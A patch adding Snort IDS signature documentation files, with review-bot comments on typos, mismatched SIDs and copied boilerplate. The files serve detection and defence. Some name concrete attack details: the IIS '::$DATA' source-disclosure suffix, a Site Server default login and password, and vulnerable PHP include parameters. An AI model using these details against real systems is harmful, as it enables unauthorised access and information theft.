+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+NGSSoftware Advisory:
+http://www.nextgenss.com/advisories/mssql-jobs2.txt
+
+--
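Review bot: The Sid field is empty (`+Sid: ` followed by a blank line) although the file is 676.txt; fill in 676 so the document can be matched to its rule. The paragraph "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" is copied from a telnet/shell rule and does not belong in a document about SQL commands; remove it or replace it with what the rule actually matches (the NGSSoftware mssql-jobs2 advisory cited under Additional References concerns SQL Server Agent jobs, so naming the procedure the rule matches would make this usable). "Attack Scenarios: Simple. These are SQL database commands." is an Ease of Attack answer, not a scenario; describe how the command reaches the server (through SQL injection in a web application, or a direct connection from outside the protected network, which False Positives already alludes to).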
--- /dev/null
+++ b/doc/signatures/652.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+652
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
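Review bot: "instrucions" should read "instructions" and "NOOP" is normally written NOP; more importantly, Attack Scenarios narrows a generic shellcode rule to one case (the Microsoft Workstation service logging overflow) without saying so, which will confuse readers who see this event on non-RPC traffic. State that it is one example among many, or move it to a general description. False Positives should say more than "binary file transfers": any traffic carrying long runs of the same byte (compressed or encrypted data, images) can match a NOP-sled pattern, and the usual tuning is to restrict the rule to the ports and direction of the services being protected; that is worth stating under False Positives or Corrective Action.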
--- /dev/null
+++ b/doc/signatures/2985.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2176
+
+--
+Summary:
+This event is generated when an attempt is made to access a system
+file via SMB. 
+
+--
+Impact:
+Serious. This file contains important operating system information.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to access a file
+containing important operating system information using SMB across the
+network.
+
+--
+Affected Systems:
+Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If this file is accessible via SMB the attacker can manipulate the
+operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
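Review bot: The Sid in the body (2176) does not match the filename 2985.txt; one of them is wrong and the document will be attached to the wrong rule. The "system file" is never named in Summary, Impact or Detailed Information, while Attack Scenarios and the references (Q153183 on restricting remote registry access, CAN-1999-0562, winreg) point to remote registry access over SMB; state exactly which path or named pipe the rule matches so the alert can be interpreted. Corrective Action's "Turn off file and print sharing" is broader than needed if the real issue is remote registry access; restricting the winreg key as described in Q153183 is the targeted fix and is already among the references.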
--- /dev/null
+++ b/doc/signatures/100000507.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000507
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "FlashChat" application running on a webserver. 
+Access to the file "adminips.php" using a remote file being passed as the 
+"banned_file" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "banned_file" parameter in the "adminips.php" script 
+used by the "FlashChat" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using FlashChat
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
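Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application ... validating the credentials of a client host") describes a credential-validation weakness, which is not what a remote file include through the "banned_file" parameter of "adminips.php" is; it reads as template text and should be dropped or rewritten around the include. Typos in the same section: "ona web server" should be "on a web server", and "attackers choosing" (here and in Impact) should be "attacker's choosing". The Sid block lacks the blank line before "--" that the other files use, and Additional References is empty for a vulnerability the text says has public exploits; add the advisory.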
--- /dev/null
+++ b/doc/signatures/3226.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3226
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
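Review bot: "Expoit code exists." under Ease of Attack should read "Exploit code exists." Additional References is empty although the Summary calls this a known vulnerability with public exploit code; the vendor bulletin and CVE entry belong there so analysts can confirm patch status. Attack Scenarios ("a request for a file with an overly long filename via a network share") does not obviously match Detailed Information, which describes a malformed request sent to an RPC port; reconcile the two so the reader knows whether the trigger is a share access or an RPC request.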
--- /dev/null
+++ b/doc/signatures/160.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+159
+
+--
+Summary:
+This event is generated when incoming an data stream associated with the NetMetro Trojan Horse is detected.
+
+--
+Impact:
+Limited control of the target host.
+
+--
+Detailed Information:
+Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+The server portion opens TCP port 5031 by default to establish a connection between client and server. This event indicates that a host external to the protected network running a NetMetro Trojan Server is communicating with a host on the protected network that may be controlling the Trojan.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named NMS.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+A reboot of the infected machine is recommended. The Trojan does not start automatically at boot time nor does it change any system registry settings.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS79
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/NetMetro/index.html
+
+--
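Review bot: the Sid field reads "159" while the file is doc/signatures/160.txt; check which SID this text documents. Summary: "when incoming an data stream" should be "when an incoming data stream". Corrective Action only recommends a reboot, which on the text's own account ("does not start automatically at boot time") merely stops the running server; the server binary NMS.exe named under Ease of Attack is still on disk, so the section should also say to remove it and to scan the host with current virus definitions, as Ease of Attack already recommends.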
--- /dev/null
+++ b/doc/signatures/975.txt
@@ -0,0 +1,66 @@
+Should be obsolete when httpinspect is used
+Rule:
+
+--
+Sid:
+975
+
+--
+Summary:
+This event is generated when an attempt is made to access an Active Server Page (ASP) .asp file to disclose its contents. 
+
+--
+Impact:
+Intelligence gathering activity.  A vulnerability exists that discloses the .asp file contents when the file name is appended with "::$DATA".
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) uses Active Server Page to supply HTML and server-side scripting.  ASP files use a .asp extension.  When the file name is appended with "::$DATA", the contents of the file are disclosed instead of executing the .asp file.
+
+--
+Affected Systems:
+Hosts running IIS 3.0, IIS 4.0
+
+--
+Attack Scenarios:
+An attacker can attempt to reference a .asp file appended with "::$DATA" to see the contents of the file.  Sensitive information may by disclosed depending on the selected file. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft
+http://support.microsoft.com/default.aspx?scid=kb;EN-US;q188806
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0278
+
+Bugtraq
+http://www.securityfocus.com/bid/149
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10362
+
+--
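Review bot: the first line "Should be obsolete when httpinspect is used" sits before "Rule:" and outside every "--" delimited section, so any tool that renders these documents will emit it as part of the file; either drop it or move it into Detailed Information as a sentence explaining why the http inspect pre-processor makes this raw-content rule unnecessary. Typo in Attack Scenarios: "may by disclosed" should be "may be disclosed". Corrective Action ("Upgrade to a more current version of IIS.") could refer to the Microsoft KB article already listed under Additional References rather than only saying to upgrade.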
--- /dev/null
+++ b/doc/signatures/3137.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3137
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
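Review bot: several section markers in this file carry trailing whitespace ("-- ", "Rule: ", "Summary: ", "Corrective Action: "), unlike the other files in the patch; anything that splits these documents on an exact "--" line will mis-parse it, so strip the trailing spaces. Corrective Action says "Turn off windows file and print services" and "Use Samba as an alternative", but Detailed Information and Attack Scenarios describe a malicious server response exploiting the Microsoft SMB client, so disabling the host's own file and print services does not remove the client-side exposure; the advice should centre on the vendor patch and on filtering SMB to untrusted networks at the boundary. Also "windows" should be capitalised.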
--- /dev/null
+++ b/doc/signatures/1818.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1818
+
+--
+Summary:
+This event is generated when an attempt is made to access files associated with Microsoft Site Server.
+
+--
+Impact:
+Information gathering.  This attack may permit leaking of information associated with particular Site Server files.
+
+--
+Detailed Information:
+Microsoft Site Server is software for Windows NT servers that allows users to publish, find, and share information.  There is a vulnerability that allows leaking of information of some Site Server files when an attacker logs on with the username of 'LDAP_AnonymousUser' and a password of 'LdapPassword_1'.
+
+--
+Affected Systems:
+Microsoft Site Server 3.0 
+
+--
+Attack Scenarios:
+An attacker can log on to Site Server using a default username and password to view Site Server files.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply Service Pack 4.
+
+
+--
+Contributors:
+Original rute writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11018
+
+--
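Review bot: "Apply Service Pack 4." under Corrective Action does not say which product's service pack; Affected Systems lists Microsoft Site Server 3.0, so state the product explicitly so readers do not patch the wrong thing. Detailed Information names a default account and password; since that is what the attack uses, Corrective Action should also say to disable that default account or change its password. Typo under Contributors: "Original rute writer" should be "Original rule writer". There is an extra blank line after Corrective Action.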
--- /dev/null
+++ b/doc/signatures/100000811.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000811
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPBB" application running on a webserver. Access to the file "attach_rules.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "attach_rules.php" script used by the "PHPBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
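Review bot: the two empty lines before "Rule:" are not in the other files and should be removed. The third paragraph of Detailed Information ("...validating the credentials of a client host...") is unrelated to a remote file include via "phpbb_root_path" in "attach_rules.php" and should be dropped; "ona web server" is a typo for "on a web server", and "attackers choosing" should be "attacker's choosing". Affected Systems ("All systems running CGI applications using PHPBB") is circular; name the affected versions if known. Additional References is empty.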
--- /dev/null
+++ b/doc/signatures/2257.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Messenger service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to improper length validation in the Microsoft Windows Messenger
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, this vulnerability may present the attacker with the
+opportunity to execute code with the privileges of the local system
+account with full access to all resources on the target host.
+
+--
+Affected Systems:
+	Microsoft Windows NT Workstation 4.0, Service Pack 6a
+	Microsoft Windows NT Server 4.0, Service Pack 6a
+	Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
+	Microsoft Windows 2000, Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP Gold, Service Pack 1
+	Microsoft Windows XP 64-bit Edition
+	Microsoft Windows XP 64-bit Edition Version 2003
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2003 64-bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Disable the Windows messenger service
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/575892
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-043.asp
+
+--
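Review bot: the Sid field is empty; the file is doc/signatures/2257.txt, so "2257" is presumably intended, but the value must be filled in or the documentation cannot be matched to the rule. "Disable the Windows messenger service" under Corrective Action and "None known" under False Negatives lack terminating periods. Attack Scenarios ("The attacker may use one of the available exploits") says nothing about what the rule sees on the wire; Detailed Information mentions improper length validation, so stating which characteristic of the Messenger request the rule keys on would help analysts judge a hit.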
--- /dev/null
+++ b/doc/signatures/122-22.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-22
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+filtered decoy portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
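Review bot: typos in Impact and Detailed Information: "reconnaisance" should be "reconnaissance" and "consititute" should be "constitute"; "udp" in the Summary should be "UDP". The two blank lines before "Rule:" should go. "Apply any appropriate vendor supplied patches as appropriate." repeats "appropriate". The False Positives section is the most useful part for an operator; rather than "should be tuned to ignore the audit", name the sfPortscan option that excludes authorised scanner addresses, since the text already points readers at README.sfportscan for tuning.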
--- /dev/null
+++ b/doc/signatures/100000849.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+100000849
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "IceWarp" application running on a webserver. Access to the file "include.php" using a remote file being passed as the "language" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "language" parameter in the "include.php" script used by the "IceWarp" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IceWarp
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
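Review bot: as in the other remote file include files in this patch, the third paragraph of Detailed Information (credential validation of a client host) does not describe a file include through the "language" parameter of "include.php" and should be dropped; "ona web server" should be "on a web server" and "attackers choosing" should be "attacker's choosing". The Sid block lacks the blank line before "--", Affected Systems is circular, and Additional References is empty although Ease of Attack says exploits exist.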
--- /dev/null
+++ b/doc/signatures/3049.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3049
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
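Review bot: Additional References is empty although Affected Systems pins the issue to "Ethereal 0.10.7 and prior"; add the Ethereal security advisory so the version statement can be checked. Detailed Information says the DoS arises when the parser trusts "a specified ACE size of 0"; a sentence saying whether the rule matches on that zero size would tell analysts what a hit means. Trailing whitespace on the "-- " and "Rule: " lines should be removed, and "Apply the appropriate vendor supplied patch" lacks a period.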
--- /dev/null
+++ b/doc/signatures/3322.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3322
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
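Review bot: this file is a word-for-word copy of doc/signatures/3226.txt, including the "Expoit" typo in Ease of Attack and the empty Additional References; only the Sid differs. If SIDs 3226 and 3322 detect different variants of the RPC DCOM attack (different ports, transports or encodings), the Summary or Detailed Information should say what distinguishes them; otherwise an analyst seeing both cannot tell them apart.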
--- /dev/null
+++ b/doc/signatures/476.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+
+Sid:
+476
+
+--
+
+Summary:
+This event is generated when Webtrends Security Scanner generates an ICMP echo
+request message.
+
+--
+
+Impact:
+ICMP echo requests are used to determine if a host is running at a
+specific IP address.  A remote attacker can scan a large range of hosts
+using ICMP echo requests to determine what hosts are operational on the
+network.
+
+--
+
+Detailed Information:
+Webtrends Ecurity Scanner generates a ICMP Echo Request message containing the
+following hex signature:
+
+|00000000454545454545454545454545|
+
+By searching for this string in a packet, it is possible to determine
+the type of host that generated the request.
+
+--
+
+Attack Scenarios:
+A remote attacker might scan a large range of hosts using ICMP echo
+requests to determine what hosts are operational on the network.
+
+--
+
+Ease of Attack:
+Simple.  The "ping" utility found on most operating systems can generate
+these types of ICMP messages.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+Packet generation tools can generate ICMP Echo requests with
+user-defined payloads.  This could allow attackers to replace this
+signature with binary values and conceal their operating system.
+
+--
+
+Corrective Action:
+To prevent information gathering, use a firewall to block incoming ICMP
+Type 8 Code 0 traffic.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://www.whitehats.com/info/IDS307
+
+
+--
